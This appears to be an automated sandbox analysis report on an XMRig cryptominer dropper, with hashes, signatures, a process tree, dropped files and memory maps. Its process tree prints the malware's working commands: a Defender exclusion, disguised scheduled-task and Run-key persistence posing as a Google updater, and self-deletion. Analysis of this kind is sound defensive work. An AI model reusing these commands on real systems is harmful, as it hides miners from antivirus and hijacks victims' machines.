Resubmissions

25-01-2024 16:55

240125-vfcyksbhgr 10

24-01-2024 17:15

240124-vstf4aecaj 10

23-01-2024 19:27

240123-x6cfvagbd9 10

23-01-2024 19:27

240123-x6bvbafgem 10

23-01-2024 19:27

240123-x6bjjsgbd8 10

23-01-2024 19:27

240123-x6ax1sfgek 10

23-01-2024 19:27

240123-x6abgsfgej 10

23-01-2024 19:27

240123-x591qagbd7 10

23-01-2024 19:27

240123-x59d7agbd6 10

23-01-2024 19:27

240123-x584esgbd5 10

Analysis

  • max time kernel
    1801s
  • max time network
    1792s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-01-2024 19:27

General

  • Target

    grhsghsGHswgh/Be5sCbvuma2nkHDa.exe

  • Size

    2.0MB

  • MD5

    a16a669a09bf158058b83e04e69fe38e

  • SHA1

    f6c94763850d9e590d86057139e8895a7aacdeea

  • SHA256

    cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

  • SHA512

    658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

  • SSDEEP

    49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 8 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 30 IoCs
  • Executes dropped EXE 1 IoCs
  • UPX packed file 31 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3420
      • C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Be5sCbvuma2nkHDa.exe
        "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Be5sCbvuma2nkHDa.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:2628
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4012
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5028
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Be5sCbvuma2nkHDa.exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:208
        • C:\Windows\System32\choice.exe
          choice /C Y /N /D Y /T 3
          3⤵
            PID:3880
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:4032
          • C:\Windows\system32\schtasks.exe
            "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
            3⤵
              PID:4712
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
            2⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:4456
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
            2⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:4604
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
            2⤵
            • Drops file in Program Files directory
            • Suspicious use of WriteProcessMemory
            PID:3648
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic PATH Win32_VideoController GET Name, VideoProcessor
              3⤵
              • Detects videocard installed
              PID:4776
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe qtdiqnkejoz
            2⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Suspicious behavior: EnumeratesProcesses
            PID:2340
        • C:\Program Files\Google\Chrome\updater.exe
          "C:\Program Files\Google\Chrome\updater.exe"
          1⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Drops file in Program Files directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2808
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
            2⤵
            • Drops file in Program Files directory
            PID:2912
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz
            2⤵
              PID:3344
          • C:\Windows\system32\rundll32.exe
            "C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
            1⤵
              PID:4804
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k UnistackSvcGroup
              1⤵
                PID:3576

              Network

              MITRE ATT&CK Matrix ATT&CK v13

              Discovery

              System Information Discovery

              1
              T1082

              Query Registry

              1
              T1012

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Program Files\Google\Chrome\updater.exe
                Filesize

                790KB

                MD5

                988509eb49792ef342088e7986cf029a

                SHA1

                30d12491d3875b2b7667f8a74f09296d668b69a1

                SHA256

                cd52bc19bdb91df4c524b8af4dedfb3fab34637c8a8550c1d66fad1b3dd88a73

                SHA512

                aa9b2f605e2c21d290f2939b9ee64c25406c1b2707613dfa64d95fa2616f1109eda9872109ab081fc887bde508ece00f51bf0fe254cf516770fe01fdf06c53b5

              • C:\Program Files\Google\Chrome\updater.exe
                Filesize

                57KB

                MD5

                3dd082b053fa36ba04a7188ab797ae63

                SHA1

                aa717c7aab3e1155d1a634db4e422b6003664b26

                SHA256

                03fd992f127a2cc2587e6401895198ee65593d76eb89a3304d5bf77624cdbfb4

                SHA512

                846ec2f9357738631772db99849bc5c7a50892bc1c8bdaeb68cd13293ce197b50f83fb8ab7d774c2e1e1250d2d4f3ece1a8890cb354d2e9fd1e75b3eb1c95ee6

              • C:\Program Files\Google\Libs\g.log
                Filesize

                226B

                MD5

                fdba80d4081c28c65e32fff246dc46cb

                SHA1

                74f809dedd1fc46a3a63ac9904c80f0b817b3686

                SHA256

                b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

                SHA512

                b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

              • C:\Users\Admin\AppData\Local\Comms\UnistoreDB\store.jfm
                Filesize

                16KB

                MD5

                f6d5601564193e093a227e4b1e738830

                SHA1

                2f30bb5d7a5ec4b2c5ba79fa73537342ae5ed534

                SHA256

                4dadcd790f63b3c8bbca57911faa6b39e757e7730d5dad433a942c654abfedb9

                SHA512

                921c03777bb9402ba5362b813fdede8acec4beb56d3888b850d9dbfb14c35c0b6be090131a84dd8c13478bcf27b0eeebff85b5f702a27dd7b113f7b613a474b7

              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                Filesize

                2KB

                MD5

                d85ba6ff808d9e5444a4b369f5bc2730

                SHA1

                31aa9d96590fff6981b315e0b391b575e4c0804a

                SHA256

                84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                SHA512

                8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                Filesize

                944B

                MD5

                6d42b6da621e8df5674e26b799c8e2aa

                SHA1

                ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

                SHA256

                5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

                SHA512

                53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                Filesize

                1KB

                MD5

                a16b84830c7c18df54f25c15d0f81951

                SHA1

                9d817fc72fbaf76175e677dec66002e9bdff6da0

                SHA256

                0d7a62ab7c299a90db4e2ec1a6c4b10e7bf17879f699f042728e7f4870c69a53

                SHA512

                98b62f81111e958787db2137649d7ae1769ae142dce1d824a8093283fac50846f59e0b1e1cfe26ed07322bee1c8ddad2bc1b18a0d69ecaa1f79c7a9bc26300b6

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xugnlpj0.i3i.ps1
                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                Filesize

                4KB

                MD5

                bdb25c22d14ec917e30faf353826c5de

                SHA1

                6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

                SHA256

                e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

                SHA512

                b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

              • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                Filesize

                1KB

                MD5

                b42c70c1dbf0d1d477ec86902db9e986

                SHA1

                1d1c0a670748b3d10bee8272e5d67a4fabefd31f

                SHA256

                8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

                SHA512

                57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

              • memory/2340-136-0x00007FF7E9BA0000-0x00007FF7E9BB6000-memory.dmp
                Filesize

                88KB

              • memory/2340-127-0x00007FF7E9BA0000-0x00007FF7E9BB6000-memory.dmp
                Filesize

                88KB

              • memory/2628-35-0x00007FF7E97B0000-0x00007FF7E99C1000-memory.dmp
                Filesize

                2.1MB

              • memory/2628-0-0x00007FF7E97B0000-0x00007FF7E99C1000-memory.dmp
                Filesize

                2.1MB

              • memory/2808-121-0x00007FF6BFFD0000-0x00007FF6C01E1000-memory.dmp
                Filesize

                2.1MB

              • memory/2808-53-0x00007FF6BFFD0000-0x00007FF6C01E1000-memory.dmp
                Filesize

                2.1MB

              • memory/3344-163-0x00007FF6F4390000-0x00007FF6F4B84000-memory.dmp
                Filesize

                8.0MB

              • memory/3344-187-0x00007FF6F4390000-0x00007FF6F4B84000-memory.dmp
                Filesize

                8.0MB

              • memory/3344-177-0x00007FF6F4390000-0x00007FF6F4B84000-memory.dmp
                Filesize

                8.0MB

              • memory/3344-175-0x00007FF6F4390000-0x00007FF6F4B84000-memory.dmp
                Filesize

                8.0MB

              • memory/3344-181-0x00007FF6F4390000-0x00007FF6F4B84000-memory.dmp
                Filesize

                8.0MB

              • memory/3344-183-0x00007FF6F4390000-0x00007FF6F4B84000-memory.dmp
                Filesize

                8.0MB

              • memory/3344-185-0x00007FF6F4390000-0x00007FF6F4B84000-memory.dmp
                Filesize

                8.0MB

              • memory/3344-173-0x00007FF6F4390000-0x00007FF6F4B84000-memory.dmp
                Filesize

                8.0MB

              • memory/3344-171-0x00007FF6F4390000-0x00007FF6F4B84000-memory.dmp
                Filesize

                8.0MB

              • memory/3344-169-0x00007FF6F4390000-0x00007FF6F4B84000-memory.dmp
                Filesize

                8.0MB

              • memory/3344-167-0x00007FF6F4390000-0x00007FF6F4B84000-memory.dmp
                Filesize

                8.0MB

              • memory/3344-165-0x00007FF6F4390000-0x00007FF6F4B84000-memory.dmp
                Filesize

                8.0MB

              • memory/3344-133-0x00007FF6F4390000-0x00007FF6F4B84000-memory.dmp
                Filesize

                8.0MB

              • memory/3344-161-0x00007FF6F4390000-0x00007FF6F4B84000-memory.dmp
                Filesize

                8.0MB

              • memory/3344-159-0x00007FF6F4390000-0x00007FF6F4B84000-memory.dmp
                Filesize

                8.0MB

              • memory/3344-157-0x00007FF6F4390000-0x00007FF6F4B84000-memory.dmp
                Filesize

                8.0MB

              • memory/3344-155-0x00007FF6F4390000-0x00007FF6F4B84000-memory.dmp
                Filesize

                8.0MB

              • memory/3344-153-0x00007FF6F4390000-0x00007FF6F4B84000-memory.dmp
                Filesize

                8.0MB

              • memory/3344-151-0x00007FF6F4390000-0x00007FF6F4B84000-memory.dmp
                Filesize

                8.0MB

              • memory/3344-149-0x00007FF6F4390000-0x00007FF6F4B84000-memory.dmp
                Filesize

                8.0MB

              • memory/3344-147-0x00007FF6F4390000-0x00007FF6F4B84000-memory.dmp
                Filesize

                8.0MB

              • memory/3344-179-0x00007FF6F4390000-0x00007FF6F4B84000-memory.dmp
                Filesize

                8.0MB

              • memory/3344-145-0x00007FF6F4390000-0x00007FF6F4B84000-memory.dmp
                Filesize

                8.0MB

              • memory/3344-143-0x00007FF6F4390000-0x00007FF6F4B84000-memory.dmp
                Filesize

                8.0MB

              • memory/3344-141-0x00007FF6F4390000-0x00007FF6F4B84000-memory.dmp
                Filesize

                8.0MB

              • memory/3344-189-0x00007FF6F4390000-0x00007FF6F4B84000-memory.dmp
                Filesize

                8.0MB

              • memory/3344-139-0x0000027DBFC80000-0x0000027DBFCA0000-memory.dmp
                Filesize

                128KB

              • memory/3344-138-0x0000027DBFC60000-0x0000027DBFC80000-memory.dmp
                Filesize

                128KB

              • memory/3344-137-0x00007FF6F4390000-0x00007FF6F4B84000-memory.dmp
                Filesize

                8.0MB

              • memory/3344-132-0x00007FF6F4390000-0x00007FF6F4B84000-memory.dmp
                Filesize

                8.0MB

              • memory/3344-135-0x00007FF6F4390000-0x00007FF6F4B84000-memory.dmp
                Filesize

                8.0MB

              • memory/3344-120-0x00007FF6F4390000-0x00007FF6F4B84000-memory.dmp
                Filesize

                8.0MB

              • memory/3344-130-0x0000027DBFC80000-0x0000027DBFCA0000-memory.dmp
                Filesize

                128KB

              • memory/3344-122-0x0000027DBFAA0000-0x0000027DBFAC0000-memory.dmp
                Filesize

                128KB

              • memory/3344-129-0x0000027DBFC60000-0x0000027DBFC80000-memory.dmp
                Filesize

                128KB

              • memory/3344-128-0x00007FF6F4390000-0x00007FF6F4B84000-memory.dmp
                Filesize

                8.0MB

              • memory/3344-126-0x0000027DBFC20000-0x0000027DBFC60000-memory.dmp
                Filesize

                256KB

              • memory/4012-10-0x0000027495460000-0x0000027495482000-memory.dmp
                Filesize

                136KB

              • memory/4012-11-0x00007FF9D2420000-0x00007FF9D2EE1000-memory.dmp
                Filesize

                10.8MB

              • memory/4012-13-0x0000027493AE0000-0x0000027493AF0000-memory.dmp
                Filesize

                64KB

              • memory/4012-12-0x0000027493AE0000-0x0000027493AF0000-memory.dmp
                Filesize

                64KB

              • memory/4012-16-0x00007FF9D2420000-0x00007FF9D2EE1000-memory.dmp
                Filesize

                10.8MB

              • memory/4032-52-0x00007FF9D2420000-0x00007FF9D2EE1000-memory.dmp
                Filesize

                10.8MB

              • memory/4032-45-0x00007FF9D2420000-0x00007FF9D2EE1000-memory.dmp
                Filesize

                10.8MB

              • memory/4032-48-0x00000209A91C0000-0x00000209A91D0000-memory.dmp
                Filesize

                64KB

              • memory/4032-49-0x00000209A91C0000-0x00000209A91D0000-memory.dmp
                Filesize

                64KB

              • memory/4032-46-0x00000209A91C0000-0x00000209A91D0000-memory.dmp
                Filesize

                64KB

              • memory/4456-54-0x00007FF9D2420000-0x00007FF9D2EE1000-memory.dmp
                Filesize

                10.8MB

              • memory/4456-76-0x000001FED9E30000-0x000001FED9EE5000-memory.dmp
                Filesize

                724KB

              • memory/4456-55-0x000001FEC0D30000-0x000001FEC0D40000-memory.dmp
                Filesize

                64KB

              • memory/4456-75-0x00007FF4B7970000-0x00007FF4B7980000-memory.dmp
                Filesize

                64KB

              • memory/4456-87-0x00007FF9D2420000-0x00007FF9D2EE1000-memory.dmp
                Filesize

                10.8MB

              • memory/4456-84-0x000001FEC0D30000-0x000001FEC0D40000-memory.dmp
                Filesize

                64KB

              • memory/4456-83-0x000001FEDA090000-0x000001FEDA09A000-memory.dmp
                Filesize

                40KB

              • memory/4456-82-0x000001FEDA040000-0x000001FEDA046000-memory.dmp
                Filesize

                24KB

              • memory/4456-80-0x000001FEDA070000-0x000001FEDA08A000-memory.dmp
                Filesize

                104KB

              • memory/4456-81-0x000001FEDA030000-0x000001FEDA038000-memory.dmp
                Filesize

                32KB

              • memory/4456-79-0x000001FEC0E20000-0x000001FEC0E2A000-memory.dmp
                Filesize

                40KB

              • memory/4456-78-0x000001FEDA050000-0x000001FEDA06C000-memory.dmp
                Filesize

                112KB

              • memory/4456-77-0x000001FEC0DF0000-0x000001FEC0DFA000-memory.dmp
                Filesize

                40KB

              • memory/4456-74-0x000001FEC0E00000-0x000001FEC0E1C000-memory.dmp
                Filesize

                112KB

              • memory/4604-114-0x000001A6289F0000-0x000001A628A00000-memory.dmp
                Filesize

                64KB

              • memory/4604-89-0x00007FF9D2420000-0x00007FF9D2EE1000-memory.dmp
                Filesize

                10.8MB

              • memory/4604-90-0x000001A6289F0000-0x000001A628A00000-memory.dmp
                Filesize

                64KB

              • memory/4604-116-0x00007FF9D2420000-0x00007FF9D2EE1000-memory.dmp
                Filesize

                10.8MB

              • memory/4604-112-0x00007FF408C40000-0x00007FF408C50000-memory.dmp
                Filesize

                64KB

              • memory/4604-111-0x000001A6297A0000-0x000001A629855000-memory.dmp
                Filesize

                724KB

              • memory/4604-91-0x000001A6289F0000-0x000001A628A00000-memory.dmp
                Filesize

                64KB

              • memory/4604-113-0x000001A6289F0000-0x000001A628A00000-memory.dmp
                Filesize

                64KB

              • memory/5028-33-0x00007FF9D2420000-0x00007FF9D2EE1000-memory.dmp
                Filesize

                10.8MB

              • memory/5028-31-0x000001F5144F0000-0x000001F514500000-memory.dmp
                Filesize

                64KB

              • memory/5028-30-0x000001F5144F0000-0x000001F514500000-memory.dmp
                Filesize

                64KB

              • memory/5028-29-0x000001F5144F0000-0x000001F514500000-memory.dmp
                Filesize

                64KB

              • memory/5028-28-0x00007FF9D2420000-0x00007FF9D2EE1000-memory.dmp
                Filesize

                10.8MB